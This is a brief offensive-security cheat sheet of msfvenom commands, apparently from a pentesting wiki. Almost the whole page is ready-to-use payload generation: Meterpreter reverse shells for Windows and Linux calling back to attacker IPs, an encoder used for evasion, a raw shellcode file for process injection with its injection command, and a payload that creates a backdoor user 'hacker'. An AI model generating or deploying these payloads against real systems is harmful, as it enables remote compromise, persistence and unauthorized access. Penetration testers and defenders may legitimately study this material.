πMSFVENOM

Create Windows Service
sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.11.36.145 LPORT=4444 -f exe-service -o new-service.exe
C++ Shellcode
credit: https://redops.at/en/blog/meterpreter-vs-modern-edrs-in-2023
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=External_IPv4_Redirector LPORT=80 -f c
Generates an encoded x86-64 reverse tcp meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
Shellcode
Windows Meterpreter Reverse TCP Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
Create bin file for process injection
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=7777 -f raw -o meter32.bin exitfunc=thread
shell> inject_process.exe PID meter32.bin
Linux Meterpreter Reverse TCP Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language
Linux Meterpreter Reverse HTTP Shellcode
sudo msfvenom -p linux/x64/meterpreter_reverse_http LHOST=10.10.15.61 LPORT=4439 -f elf > shell.elf
Create User
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe
Last updated
Was this helpful?